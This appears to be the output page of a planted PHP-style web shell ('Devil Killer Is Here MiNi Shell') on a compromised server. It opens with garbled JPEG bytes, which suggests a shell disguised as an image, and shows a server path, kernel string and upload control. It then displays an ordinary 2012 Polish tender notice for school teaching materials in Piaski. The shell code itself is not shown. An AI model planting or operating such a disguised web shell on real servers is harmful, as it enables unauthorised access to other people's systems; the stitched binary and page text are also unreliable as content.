JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120222/53174-N-2012.html

<p class="kh_header"><b>Piaski: Dostawa materiałów dydaktycznych i pomocy edukacyjnych do realizacji projektu  
Szkoły podstawowe i gimnazjalne w gminie Piaski kuźnią wielkopolskich kadr - programy rozwojowe nr KSI POKL.09.01.02-30-243/11, współfinansowanym ze środków Unii Europejskiej, realizowanym przez Gminę Piaski - Zespół Obsługi Szkół</b><br>
<b>Numer ogłoszenia: 53174 - 2012; data zamieszczenia: 22.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Szkół , ul. Szkolna 1, 63-820 Piaski, woj. wielkopolskie, tel. 65 5727697, faks 65 5727698.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów dydaktycznych i pomocy edukacyjnych do realizacji projektu  
Szkoły podstawowe i gimnazjalne w gminie Piaski kuźnią wielkopolskich kadr - programy rozwojowe nr KSI POKL.09.01.02-30-243/11, współfinansowanym ze środków Unii Europejskiej, realizowanym przez Gminę Piaski - Zespół Obsługi Szkół.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów dydaktycznych i pomocy edukacyjnych do realizacji projektu  Szkoły podstawowe i gimnazjalne w gminie Piaski kuźnią wielkopolskich kadr - programy rozwojowe, współfinansowanym ze środków Unii Europejskiej, realizowanego przez Gminę Piaski Zespół Obsługi Szkół.  
Przedmiotem zamówienia jest zakup materiałów dydaktycznych i pomocy edukacyjnych niezbędnych do realizacji projektu. Opis przedmiotu zamówienia uwzględnia podział na zadania i poszczególne rodzaje zajęć edukacyjnych, zgodnie z wnioskiem o dofinansowanie ww. projektu. Kod zapisany w kol. poz. określa, ze względów organizacyjnych, numer zadania oraz numer pozycji wniosku. Dopuszcza się składanie ofert częściowych. 
Zamówienie podzielone jest na pięć części. 
Wykonawca może złożyć ofertę na jedną lub więcej części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.22.00-7, 22.11.10.00-1, 22.83.20.00-1, 30.12.51.10-5, 32.33.13.00-5, 32.32.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić: 
a) Aktualny odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy; b) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. c) Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych. Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 6 specyfikacji istotnych warunków zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wyżej wymienione warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. W razie zaistnienia w trakcie realizacji zamówienia, istotnych okoliczności, na które zamawiający i wykonawca nie mieli wpływu, a mogących mieć wpływ na termin wykonania zamówienia, zamawiający dopuszcza zmianę terminu jego wykonania. Powyższa zmiana wymaga formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.piaski-wlkp.pl/jednostka/55/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Szkół ul. Szkolna 1 63-820 Piaski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2012 godzina 08:00, miejsce: Zespół Obsługi Szkół ul. Szkolna 1 63-820 Piaski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu Szkoły podstawowe i gimnazjalne w gminie Piaski kuźnią wielkopolskich kadr - programy rozwojowe nr KSI POKL.09.01.02-30-243/11  jest współfinansowana ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w Programie Operacyjnym Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały dydaktyczne i pomoce edukacyjne do zajęć pozalekcyjnych języka polskiego w klasach 0-3 Szkoły Podstawowej, języka angielskiego w klasach 0-3 Szkoły Podstawowej, nauczania wczesnoszkolnego, informatyki, przyrody, matematyki, przedsiębiorczości zajęć artystycznych oraz zajęć efektywnej nauki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz.	Wyszczególnienie	j.m	Ilość 
2.8	Tornister dla uczniów/ uczennic j. polski	Szt. 	146
2.9	Materiały do eksperymentów   dla uczniów/ uczennic j. polski 	Szt. 	146
2.10	Materiały szkoleniowe (karty ortograficzne, piłka ortograficzna, kości, piłki do żonglowania, wskaźnik) dla uczniów / uczennic j. polski	Szt.	146
2.11	Zestaw podręczników do sprawnego czytania, skutecznego notowania, technik pamięci i koncentracji dla uczniów/ uczennic j. polski	Szt. 	146
2.12	Torba dla nauczyciela/ ki j. polski	Szt. 	6
2.13	Materiały dydaktyczne (karty ortograficzne, piłka ortograficzna, kości, stoper, piłka do żonglowania, wskaźnik) dla nauczyciela/ ki j. polski 	Szt. 	6
2.14	Materiały do eksperymentów dla nauczycieli/ ek j. polski	Szt. 	
2.15	Zestaw poradników  metodycznych do ortografii, sprawnego czytania, skutecznego notowania, technik pamięci i koncentracji dla nauczycieli/ek j. polski	Szt. 	6
2.16	Zestaw podręczników uczniowskich do ortografii sprawnego czytania, skutecznego notowania, technik pamięci i koncentracji dla nauczycieli /ek j. polski	Szt.	6
2.17	Tablice obrazkowe dla nauczycieli/ ek j. polski	Szt. 	6
2.19	Tornister dla uczniów/ uczennic - j. angielski	Szt. 	110
2.20	Materiały dla eksperymentów dla uczniów/ uczennic j. angielski	Szt. 	110
2.21	Zestaw ćwiczeń dla uczniów/ uczennic j. angielski	Szt. 	110
2.22	Klocki z owijakami 	Szt. 	110
2.23	Zestaw płyt CD  dla ucznia/ uczennic j. angielski	Szt. 	110
2.24	Zestaw podręczników z wycinankami dla uczniów/ uczennic  j. angielski	Szt. 	110
2.25	Torba dla nauczyciela/ ki j. angielski 	Szt. 	3
2.26	Zestaw ćwiczeń uczniowskich dla nauczycieli/ ek j. angielski	Szt. 	3
2.27	Klocki z owijakami dla nauczycieli/ ek j. angielski	Szt.	3
2.28	Materiały do eksperymentów dla nauczycieli/ ek j. angielski	Szt.	3
2.29	Zestaw poradników metodycznych dla nauczycieli/ ek j. angielski 	Szt. 	3
2.30	Zestaw płyt CD/ DVD z bajkami, piosenkami, slajdami dla nauczycieli/ ek j. angielski	Szt. 	3
2.31	Zestaw podręczników uczniowskich z wycinankami dla nauczycieli/ ek j. angielski	Szt.	3
2.32	Karty obrazkowe dla nauczycieli/ ek j. angielski	Szt. 	3
2.33	Kostiumy do teatrzyku dla nauczycieli/ek	Szt.	3
2.34	Materiały dydaktyczne (koło fortuny, pajacyk, układanki, osiołek, szablony edukacyjne) dla nauczycieli/ ek j. angielski	Szt. 	3
2.36	Materiały dydaktyczne do zajęć z nauczania wczesnoszkolnego zestaw plansz dla nauczycieli	Szt. 	3
2.37	Materiały dydaktyczne do zajęć z nauczania wczesnoszkolnego zestaw gier edukacyjnych dla nauczycieli	Szt. 	3
2.38	Materiały dydaktyczne (tablica do zajęć zintegrowanych) do zajęć pozalekcyjnych z nauczania wczesnoszkolnego	Szt. 	3
2.41	Materiały dydaktyczne do zajęć pozalekcyjnych z informatyki 3 szkoły podstawowe i 3 szkoły gimnazjalne (podręcznik, zestaw ćwiczeń, pomoce dydaktyczne)	Szt. 	6
2.42	Materiały dydaktyczne do zajęć pozalekcyjnych z informatyki dla uczniów  i uczennic (podręcznik zestaw ćwiczeń, pomoce dydaktyczne) 	Szt. 	123
2.44	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw podręczników dla nauczycieli i nauczycielek	Szt. 	6
2.45	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw plansz matematycznych dla nauczycieli i nauczycielek	Szt.	6
2.46	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw brył dla nauczycieli i nauczycielek	Szt. 	6
2.47	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw gier logicznych dla nauczycieli i nauczycielek	Szt. 	6
2.48	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw podręczników dla uczniów i uczennic	Szt. 	136
2.49	Materiały dydaktyczne do zajęć pozalekcyjnych z matematyki - zestaw ćwiczeń dla uczniów i uczennic	Szt. 	136
2.52	Materiały dydaktyczne (obserwatorium glebowe) do zajęć pozalekcyjnych z przyrody	Szt.	3
2.53	Materiały dydaktyczne ( mini szklarnia) do zajęć pozalekcyjnych z przyrody	Szt. 	3
2.54	Materiały dydaktyczne ( stacja pogody) do zajęć pozalekcyjnych z przyrody	Szt.	3
2.55	Materiały dydaktyczne ( zestaw preparatów mikroskopowych) 	Szt. 	3
2.56	Materiały dydaktyczne ( mikroskop) do zajęć pozalekcyjnych z przyrody	Szt. 	3
2.57	Materiały dydaktyczne ( globus fizyczny) do zajęć pozalekcyjnych z przyrody 	Szt.	3
2.58	Materiały dydaktyczne ( atlas przyrodniczy) do zajęć pozalekcyjnych z przyrody	Szt. 	3
2.61	Materiały dydaktyczne dla uczniów i uczennic do zajęć z przedsiębiorczości 1 SP i 3 SG	Zestaw 	54
2.62	Materiały dydaktyczne dla nauczycieli i nauczycielek do zajęć z przedsiębiorczości	Zestaw 	4
2.64	Materiały dydaktyczne (zestaw płyt CD z muzyką) do zajęć pozalekcyjnych artystycznych 3 SP i 3SG	Zestaw 	6
2.65	Materiały dydaktyczne (radiomagnetofon z odtwarzaczem CD) do zajęć pozalekcyjnych artystycznych 	Szt. 	3
2.66	Materiały dydaktyczne (stroje do tańca do uczniów i uczennic) do zajęć pozalekcyjnych artystycznych	Zestaw  	106
2.67	Materiały dydaktyczne (zestaw składający się między innymi farb akrylowych, pędzli, płócien, pędzli, terpentyny itp.) do zajęć pozalekcyjnych artystycznych	zestaw	106
2.68	Materiały dydaktyczne do dekoracji sceny (zestaw składający się między innymi z kartonów, farb, kurtyny)  do zajęć pozalekcyjnych artystycznych	Zestaw	6
2.69	Materiały dydaktyczne (sprzęt nagłaśniający i mikrofon)  do zajęć pozalekcyjnych artystycznych	Zestaw 	6
2.70	Materiały dydaktyczne (zestaw składający się z lampy, żarówki, wymiennych filtrów) do oświetlenia sceny w ramach  zajęć pozalekcyjnych artystycznych	Zestaw	6
2.71	Materiały dydaktyczne (materiały do przygotowania kostiumów teatralnych) do  zajęć pozalekcyjnych artystycznych	Zestaw	6
2.74	Materiały szkoleniowe (10 kości, 3 piłki do żonglowania, wskaźnik) dla uczniów uczennic do zajęć pozalekcyjnych - efektywna nauka	Zestaw 	64
2.75	Tornister dla uczniów/ uczennic do zajęć pozalekcyjnych - efektywna nauka	Szt. 	64
2.76	Materiały do eksperymentów  dla uczniów/ uczennic do zajęć pozalekcyjnych - efektywna nauka	Zestaw 	64
2.77	Zestaw podręczników do sprawnego czytania, skutecznego notowania oraz technik pamięci i koncentracji dla uczniów/ uczennic	Zestaw 	64
2.78	Karty uczniowskie z zagadkami logicznymi w teczce dla uczniów/ uczennic do zajęć efektywna nauka	Zestaw 	64
2.79	Płyta CD ze slajdami dla nauczycieli/ ek do zajęć pozalekcyjnych efektywna nauka	Zestaw	3
2.80	Materiały dydaktyczne(10 kości, stoper, 3 piłki do żonglowania, wskaźnik) dla nauczycieli i nauczycielek do zajęć pozalekcyjnych - efektywna nauka	Zestaw 	3
2.81	Torba do nauczyciela/ ki do zajęć pozalekcyjnych - efektywna nauka	Zestaw 	3
2.82	Materiały do eksperymentów dla nauczycieli/ ek  do zajęć pozalekcyjnych - efektywna nauka	Zestaw 	3
2.83	Zestaw poradników metodycznych do sprawnego czytania, skutecznego notowania oraz technik pamięci i koncentracji dla nauczycieli/ ek	Zestaw	3
2.84	Zestaw podręczników uczniowskich do sprawnego czytania	Zestaw	3

Ze względu na złożoność, bardzo szeroki zakres opisywanych towarów i szczególny charakter zamówienia, parametry zamawianych pomocy zostały szczegółowo opisane w formularzach cenowych dla poszczególnych części. Użyte w szczegółowym opisie nazwy produktów zostały zastosowane w celu zaprezentowania wymaganych parametrów użytkowych sprzętu i towarów. W celu przedstawienia cech poszczególnych materiałów w opisie użyto nazw produktów powszechnie dostępnych na rynku. Użycie konkretnych nazw i symboli zostało zastosowanie dla przedstawienia zespołu właściwości, cech i funkcjonalności wymaganych przez zamawiającego. Zamawiający dopuszcza zastosowanie równoważnego sprzętu innych producentów pod warunkiem, że ich parametry odpowiadają przykładom przedstawionym przez Zamawiającego. 
Zastosowanie rozwiązań alternatywnych musi zostać zaakceptowane przez Zamawiającego nie później niż na etapie badania ofert. Zamawiający dopuszcza oferowanie przez wykonawców innych produktów równoważnych tzn. takich, które posiadają co najmniej takie same parametry techniczne, zespół funkcji użytkowych czy zakres tematyczny i merytoryczny. W przypadku zastosowania produktów równoważnych, produkt musi być równoważny dla wszystkich cech produktu bazowego, również tych z powodów technicznych nie umieszczonych w szczegółowym opisie, a mogących mieć znaczenie przy określaniu stopnia parametrów i cech wymaganych przez Zamawiającego. Równoważność proponowanych produktów będzie podlegać ocenie Zamawiającego na podstawie przekazanych przez Wykonawców dokumentów. W przypadku wątpliwości Wykonawcy zobowiązani są do składania zapytań przed terminem składania ofert. Odpowiedzi Zamawiającego są wiążące dla wszystkich Wykonawców. Za ostateczną wykładnię parametrów odpowiadających wymaganiom przyjmuje się wykładnię Zamawiającego. Jeżeli w ocenie zamawiającego produkt wskazany jako równoważny nie spełni ogółu stawianych wymagań zostanie uznany za nieodpowiadający wymaganiom określonym w zamówieniu. Zamawiający może żądać dodatkowych dokumentów potwierdzających spełnianie przez oferowane produkty oczekiwanych standardów, jeśli na podstawie dokumentów dołączonych do oferty zamawiający nie będzie mógł ocenić stopnia równoważności produktu. Równoważność produktu musi również odpowiadać zakresowi treści merytorycznych. Zamawiający będzie oceniał równoważność produktów ( w szczególności podręczników) względem produktu bazowego, w celu zgodności z programami zajęć edukacyjnych przygotowanymi przez prowadzących. 
Zdanie Zamawiającego jest decydujące w uznaniu czy produkt spełnia w 100% wszystkie parametry wskazanego produktu bazowego. Wykonawca musi dysponować i na wezwanie Zamawiającego przekazać potwierdzone kserokopie certyfikatów na wszystkie zamawiane pomoce dydaktyczne, które zgodnie z obowiązującymi przepisami, będą wykorzystane w edukacji dzieci i młodzieży. Zamawiający może żądać od Wykonawcy przekazania szczegółowego opisu produktu, atestów i certyfikatów w celu zbadania czy oferowane produktu odpowiadają wymaganiom Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych artykułów w zależności od posiadanych środków finansowych. Wielkość dostaw do niezwłocznej realizacji jest uzależniona od wielkości przekazanych do dyspozycji zamawiającego transzy dofinansowanie projektu. Rozliczenie z Wykonawcą będzie następować za zrealizowane dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.22.00-7, 22.11.10.00-1, 22.83.20.00-1, 32.32.20.00-6, 32.33.13.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały dydaktyczne i pomoce edukacyjne do zajęć specjalistycznych w szkołach logopedii, zajęć korekcyjno - kompensacyjnych efektywnego czytania w szkołach podstawowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz.	Wyszczególnienie	j.m	Ilość 
3.88	Materiały dydaktyczne (zestaw kart logopedycznych) do zajęć specjalistycznych logopedycznych	Zestaw	3
3.89	Materiały dydaktyczne (zestaw gier logopedycznych) do zajęć specjalistycznych logopedycznych	Zestaw 	3
3.90	Materiały dydaktyczne (zestaw obrazkowy do nauki mowy) do zajęć specjalistycznych logopedycznych	Zestaw 	3
3.92	Materiały dydaktyczne (wyprawka logopedyczna)  dla uczniów i uczennic  do zajęć specjalistycznych logopedycznych	Zestaw 	44
3.94	Materiały dydaktyczne (zestaw układanek specjalistycznych)  do zajęć specjalistycznych korekcyjno - kompensacyjnych	Zestaw	3
3.96	Materiały dydaktyczne (książka/ ćwiczenia dla dzieci dot. czytania i pisania)  do zajęć specjalistycznych korekcyjno - kompensacyjnych	Zestaw 	52
3.98	Materiały dydaktyczne do zajęć efektywnego czytania dla uczniów i uczennic	Zestaw	16
3.99	Materiały dydaktyczne do zajęć efektywnego czytania dla nauczycieli/ ek 	Zestaw 	1

Ze względu na złożoność, bardzo szeroki zakres opisywanych towarów i szczególny charakter zamówienia, parametry zamawianych pomocy zostały szczegółowo opisane w formularzach cenowych dla poszczególnych części. Użyte w szczegółowym opisie nazwy produktów zostały zastosowane w celu zaprezentowania wymaganych parametrów użytkowych sprzętu i towarów. W celu przedstawienia cech poszczególnych materiałów w opisie użyto nazw produktów powszechnie dostępnych na rynku. Użycie konkretnych nazw i symboli zostało zastosowanie dla przedstawienia zespołu właściwości, cech i funkcjonalności wymaganych przez zamawiającego. Zamawiający dopuszcza zastosowanie równoważnego sprzętu innych producentów pod warunkiem, że ich parametry odpowiadają przykładom przedstawionym przez Zamawiającego. 
